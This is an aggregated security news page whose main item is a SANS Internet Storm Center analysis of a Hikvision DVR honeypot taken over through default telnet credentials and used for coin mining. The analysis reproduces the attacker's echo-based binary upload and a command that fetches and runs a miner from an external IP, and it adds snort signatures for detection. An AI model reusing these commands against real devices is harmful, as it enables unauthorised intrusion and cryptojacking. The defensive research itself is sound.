Hackin9
Mozilla Firefox and SeaMonkey CVE-2014-1525 Use After Free Memory Corruption Vulnerability
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
EMC has agreed to acquire DSSD, a Silicon Valley startup developing technology for pooling server-based flash for high-performance data access.
 
Premier 100 IT Leader Catherine Maras also answers questions on the qualities she looks for when promoting into management and the value of writing skills.
 
Microsoft Windows Kernel 'Win32k.sys' CVE-2013-1300 Local Privilege Escalation Vulnerability
 
Mozilla Firefox/Thunderbird/SeaMonkey CVE-2014-1519 Multiple Memory Corruption Vulnerabilities
 
Target CEO Gregg Steinhafel's resignation Monday as president, CEO and chairman of the Board of the company likely isn't a sign that boards of directors are now holding chief executives accountable for massive data breaches.
 
The Apple-Samsung jury returned to court Monday to fix an error in its verdict form, but in doing so it declined to award Apple any additional damages.
 
Web users and developers should take new steps to avoid surveillance by the U.S. National Security Agency and other spy organizations, a group of privacy and digital rights advocates said Monday.
 
The dialog that appears when users want to manually change the default password on their EPCOM Hikvision S04 DVR.

It took just one day for a low-end, Internet-connected digital video recorder to become infected with malware that surreptitiously mined Bitcoins on behalf of the quick-moving attackers.

The feat, documented in a blog post published Monday by researchers at the security-training outfit Sans Institute, was all the more impressive because the DVR contained no interface for downloading software from the Internet. The lack of a Wget, ftp, or kermit application posed little challenge for the attackers. To work around the limitation, the miscreants used a series of Unix commands that effectively uploaded and executed a Wget package and then used it to retrieve the Bitcoin miner from an Internet-connected server.

Monday's observations from Sans CTO Johannes Ullrich are part of an ongoing series showing the increasing vulnerability of Internet-connected appliances to malware attacks. In this case, he bought an EPCOM Hikvision S04 DVR off eBay, put it into what he believes was its factory new condition, and connected it to a laboratory "honeypot" where it was susceptible to online attackers. In the first day, it was probed by 13 different IP addresses, six of which were able to log into it using the default username and password combination of "root" and "12345."

Read 4 remaining paragraphs | Comments

 
[security bulletin] HPSBGN03010 rev.4 - HP Software Server Automation running OpenSSL, Remote Disclosure of Information
 
[SECURITY] [DSA 2924-1] icedove security update
 
[SECURITY] [DSA 2923-1] openjdk-7 security update
 
[ANN] Struts 2.3.16.3 GA release available - security fix
 

10 tips to attract women to infosec jobs
CSO Magazine
"It fosters women of all backgrounds, in all functional organizations -- not just infosec or IT -- helping them more forward in terms of management at BAE," said Jo Cangianelli, vice president of business development for BAE System's intelligence and ...

and more »
 
Web users and developers should take new steps to avoid surveillance by the U.S. National Security Agency and other spy organizations, a group of privacy and digital rights advocates said Monday.
 
Advanced Micro Devices is bridging the gap between the x86 and ARM chip architectures and is also bringing Android support to its chips next year through a new development effort called Project Skybridge.
 
The abrupt departure of SAP technology chief Vishal Sikka has prompted a number of questions about the vendor's strategy, particularly in regard to the Hana in-memory computing platform, and what it could mean for customers.
 
Scammers pretending to be Microsoft support technicians continue to work the phones in search of victims and have grown bolder in their tactics.
 
The U.S. Federal Communications Commission should reclassify portions of broadband networks as regulated, common-carrier services to preserve net neutrality protections, Mozilla has said in a new petition to the agency.
 
To help organizations get a better handle on the R statistical programming language, which is enjoying a surge in use as a big-data analysis tool, Revolution Analytics has introduced a new support package.
 
[SECURITY] [DSA 2919-1] mysql-5.5 security update
 
Prosody XMPP Server CVE-2014-2744 XMPP-Layer Compression Denial of Service Vulnerability
 
EMC has agreed to acquire DSSD, a Silicon Valley startup developing technology for pooling server-based flash for high-performance data access.
 
Scientists at Johns Hopkins University are using nanoparticles as Trojan horses that deliver "death genes" to kill brain cancer cells that surgeons can't get to.
 
There are some movies that are timeless in nature. They can make you laugh. They can make you cry. They can inspire the viewer. Sometimes that inspiration is, well, shall we say, suboptimal.
 
IBM picked a good day to launch a suite of security tools and services: a Monday morning when many CEOs saw in their news roundup that retailer Target is newly rid of a CEO who presided over a catastrophic data breach.
 
EMC is taking on Amazon's cloud storage service with a private cloud platform it says will cost less to use.
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Multiple buffer overflows in Asterisk might allow remote attackers to cause a Denial of Service condition.
 
LinuxSecurity.com: Multiple vulnerabilities have been found in Adobe Flash Player, the worst of which could result in execution of arbitrary code.
 
LinuxSecurity.com: Two vulnerabilities have been found in WeeChat, the worst of which may allow execution of arbitrary code.
 
LinuxSecurity.com: A vulnerability in libSRTP can result in a Denial of Service condition.
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: OpenSSL could be made to crash if it received specially crafted networktraffic.
 

Commercial antivirus pioneer Symantec has finally admitted publicly what critics have been saying for years: the growing inability of the scanning software to detect the majority of malware attacks makes it "dead" and "doomed to failure," according to a published report.

Over the past two reported quarters, Symantec has watched revenue fall, and sales are expected to flag again in the most recent period when the company releases financial results later this week, an article published Monday by The Wall Street Journal reported. The declines come as Juniper Networks, FireEye, and other companies have rolled out products and services that take a decidedly different approach to securing computers and networks. Rather than scan for files that are categorized as malicious, these newer techniques aim to detect, minimize, and contain the damage that attackers can do in the event that they penetrate a customer's defenses. Citing Symantec Senior President Brian Dye, the WSJ said:

Mr. Dye, who has spent more than a decade with Symantec, says it was galling to watch other security companies surge ahead. "It's one thing to sit there and get frustrated," he says. "It's another thing to act on it, go get your act together and go play the game you should have been playing in the first place."

Symantec pioneered computer security with its antivirus software in the late 1980s. The technology keeps hackers out by checking against a list of malicious code spotted on computers. Think of it as an immune system for machines.

But hackers increasingly use novel bugs. Mr. Dye estimates antivirus now catches just 45% of cyberattacks.

That puts Symantec in a pickle. Antivirus and other products that run on individual devices still account for more than 40% of the company's revenue. Specialized cybersecurity services for businesses account for less than one-fifth of revenue and generate smaller profit margins. It would be impractical, if not impossible, to sell such services to individual consumers.

To be fair, Symantec began to move beyond malware long ago. Its Norton security suite has long included a password manager and code that detects malicious e-mails and Web links. Heuristic algorithms also attempt to detect malicious files even when they have never been seen before. But increasingly, Symantec is competing against its newer rivals by matching the suite of non-AV services they provide.

Read 1 remaining paragraphs | Comments

 
Now that Microsoft's support for the popular Windows XP operating system has ended, you'll need to use every trick in the book to stop your machines from being compromised.
 
You can't see some malware until it's too late. Sophisticated attacks arrive in pieces, each seemingly benign. Once these advanced attacks reassemble, the target is already compromised.
 
After six months as Acer's chairman, company co-founder Stan Shih plans to step down on June 18, saying he is satisfied with the PC maker's new direction.
 
Oracle MySQL Server CVE-2014-2431 Remote Security Vulnerability
 

The Criminals Behind It

After posting this diary, a brand new twitter account was used to post two tweets admitting to be behind this particular string of *coin miners:

Screen shot of tweets admitting to attack

The python code posted to pastebin looks like a plausible source of these scans. 

 

The Infection

We talked before about DVRs being abused as bitcoin (or better Litecoin) mining bots. As part of my "IoT Honeypot Lab", I started adding a DVR to see how long it took to get compromised. The DVR was installed "as purchased" and port 23 was exposed to the internet.

Initially, I saw a number of scans that found the DVR and started brute forcing passwords. These attempts ran pretty much continuously. During the first day of the test, 13 different source IPs scanned our honeypot, 6 managed to log in using the default username and password ("root", "12345").

Only one of the attackers went beyond a simple "fingerprint" of the honeypot.

Part of this attack I didn't quite understand until capturing it fully in my honeypot was how the attacker uploads the bitcoin mining binary. This DVR has no "upload" feature. There is no wget nor is there an ftp or telnet client. Instead, the initial transfer has to happen via the telnet console (nope... "kermit" isn't available either). Turns out that the attacker appears to use a wrapper script that uses a series of "echo" commands to upload the initial binary. 

Here is a quick example of one of these echo commands (spaces added to allow for sensible line breaks):

echo -ne '\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00 \x00\x00\x00\x00\x00\x05\x00\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00 \x00\x31\x00\x00\x00\x00\x00 \x00\x00\x2a\x00\x00\x00\x1b\x00\x00\x00 \x14\x00\x00\x00' >> /var/run/rand0-btcminer-arm && echo -e '\x64\x6f\x6e\x65'

The first echo writes 51 bytes to "/var/run/rand0-btcminer-arm" and the second echo returns "done", indicating that the system is ready for the next echo command.

Unlike the name implies, "rand0-btcminer-arm" is not a bitcoin miner. Instead, it just appears to be a version of "wget". Later, this wget is used to retrieve the actual miner:

./rand0-btcminer-arm http://107.178.66.153/btcminer-arm && chmod u+x btcminer-arm && ./btcminer-arm -B -o stratum+tcp://204.124.183.242:3333 -t 4 -q && echo -ne '\x64\x6f\x6e\x65'

Again, a final "done" is sent to confirm execution.

Next, the miner connects to the supplied startum proxy. The protocol exchanges JSON objects handing out workloads to different miners, effectively distributing a particular workload among many miners [1]

Our DVR first subscribes:

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3"]}

and later, the miner sends an authorization request without username / password that appears to be accepted:

request: {"id": 2, "method": "mining.authorize", "params": ["", ""]}
response: {"error": null, "id": 2, "result": true}

Throughout the day, the server periodically pushes parameters to the miner, but I haven't seen the miner return anything yet, which probably underscores the fact that these miners are pretty useless due to their weak CPUs.

The DVR did get infected multiple times, but none of the attackers changed the default password, or removed prior bitcoin miners. 

The Device

In this test, I used an EPCOM Hikvision S04 DVR without any cameras attached [2] . I purchased it off eBay ans as far as I can tell, it came in factory new condition. The device appears to be mostly built for the central/south American market. It's default language is Spanish. On first setup, the user is not asked to change the password. The only input device delivered with the system is a USB mouse and an on-screen keyboard is used. If the user changes the default password, the user is at first only offered a number-only keyboard, but it can easyly be switched to a full keyboard (again only on-screen). The configuration allows the user to change a number of different parameters. For example, it is possible to change the HTTP port used by the device. However, I have not found a reference to the telnet server in the configuration menus. There appears to be no ability to turn it off, or change the port. I also haven't seen a firewall function. The device is IPv6 capable and is more likely to be exposed to the outside world in an IPv6 setup. The device uses EUI-64 derived addresses which are somewhat guessable given that the OUI of "8c:e7:48" appears to be common to these devices (this OUI is interestingly just assigned to "Private").

Hikvision DVR Change Password Dialog
Figure 1: DVR change password dialog (click on image for larger version)

Indicators of Compromise:

Port 3333 TCP appears to be the preferred "miner" port and should be monitored.

I expect the IP addresses involved to be more ephemeral. But refer to the full packet capture for details. Here are a couple of snort signatures that worked for me:

# detect if we do have an exposed DVR in our network
alert TCP $HOME_NET 23 -> $EXTERNAL_NET any (msg: "DVR Login Prompt"; sid: 1100001; content: "|0a|dvrdvs login: "; flow: from_server, establishe\
d;)
# detect "banner" returned by busybox. Removed detailed version information
alert TCP $HOME_NET 23 -> $EXTERNAL_NET any (msg: "Successful BusyBox Telnet Login"; sid: 1100002; content: "BusyBox v"; content: "built-in shel\
l (ash)"; within: 60; flow: from_server, established;)
# specific "Subscribe" request used by this miner. May need to be a bit more generic. E.g. keep port at "any" ?
alert TCP $HOME_NET any -> $EXTERNAL_NET 3333 (msg: "bitcoin miner subscribe request"; sid: 1100003; content: "{\"id\": 1, \"method\": \"mining.\
subscribe\", \"params\"";)

Packet Capture

You can find a full packet capture at https://isc.sans.edu/diaryimages/dvrminer.pcap.

here some of the highlights to look for:

Frame 1-43: First successful login from 142.0.45.42. The attacker logs in and explores the DVR (cat /proc/version and ps). The attacker checks if the "echo" trick works and if wget is available (it is not available). Each commands ends with an "echo" command that indicates the return status. It is likely that this is a particular tool that is used to automate this exchange.

Frame 44-1229 (tcp.stream eq 1): The attacker now "uploads" wget using the "echo" trick, the uses wget to download the miner and starts the miner.

Frame 831-1223 (tcp.stream eq 2): This is the download of the bitcoin miner initiated in the prior connection. The download connects to 107.178.66.153. Looks like 107.178.66.153 runs lighttpd based on the banner returned.

Frame 1217-1246 (tcp.stream eq 3): The bitcoin miner connection.

The "game" repeats later after the honeypot was rebooted and the miner exited as a result.

[1] http://mining.bitcoin.cz/stratum-mining
[2] http://www.syscom.mx/principal/verproductoazul/s04-epcom-powered-by-hikvision-21142.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
F5 Networks BIG-IQ Remote Privilege Escalation Vulnerability
 
WordPress NextCellent Gallery Plugin CVE-2014-3123 Multiple Cross Site Scripting Vulnerabilities
 
The Pwn Phone, with its external Wi-Fi adaptor case jacked into its USB port, is prepared to do evil for your network's own good.

Mobile technology has made it possible for people to do an amazing amount with tablets and smartphones within the workplace—including hacking the living daylights out of the corporate network and other people’s devices. Pwnie Express is preparing to release a tool that will do just that. Its Pwn Phone aims to help IT departments and security professionals quickly get a handle on how vulnerable their networks are in an instant. All someone needs to do is walk around the office with a smartphone.

Pwnie Express’ Kevin Reilly gave Ars a personal walk-through of the latest Pwn Phone, the second generation of the company’s mobile penetration testing platform. While the 2012 first-generation Pwn Phone was based on the Nokia N900 and its Maemo 5 Linux-based operating system, the new phone is based on LG Nexus 5 phone hardware. However, it doesn’t exactly use Google’s vanilla Android.

“What we’ve done is taken Android 4.4 Kit Kat and recompiled the kernel,” said Reilly. “On the backend, it runs our own derivative of Kali Linux, called Pwnix. Essentially it’s running a full-blown Debian OS on the back-end of Android.“

Read 8 remaining paragraphs | Comments

 
HP Universal Configuration Management Database CVE-2013-6215 Remote Code Execution Vulnerability
 
Michigan's Kitchen Cabinet is a monthly meeting of savvy CIOs from different industries who share ideas and promote tech innovation within their state.
 
Whirlpool CIO Mike Heim says low-cost sensors will soon be found in the company's appliances, predicting the need for maintenance, noting fluctuations in temperature, and even allowing consumers to download recipes to their stoves.
 
What we've seen so far suggests that Microsoft's new CEO is his own man and willing to buck the company's traditional ways.
 
Massive leaps in computing power, hidden layers, hardware backdoors -- encrypting sensitive data from prying eyes is more precarious than ever
 
If you are ultra paranoid, what could be better than hiding your network traffic in such a way that no one could possibly intercept it? This is what Unisys is offering with its new Stealth appliance, which could make man-in-the-middle attacks and keylogger exploits obsolete, or at least more difficult to mount.
 
March data from the Bureau of Labor Statistics holds good news for IT pros, but there are different ways to slice it.
 
An offshore coding vendor offers a great price for quality work, but it may be stealing the company's source code.
 
Business people don't trust us, and we don't trust them. It sounds kind of hopeless, but it doesn't have to be.
 
The Renaissance has relevance to IT, and not just because IT is constantly being reborn.
 
The scoop: WiFi Range Extender (model EX6100), by NETGEAR, about $90
 
[security bulletin] HPSBMU03033 rev.2 - HP Insight Control Software Components running OpenSSL, Remote Disclosure of Information
 
[security bulletin] HPSBMU03024 rev.2 - HP Insight Control Server Deployment on Linux and Windows running OpenSSL with System Management Homepage and Systems Insight Manager, Remote Disclosure of Information
 
Internet Storm Center Infocon Status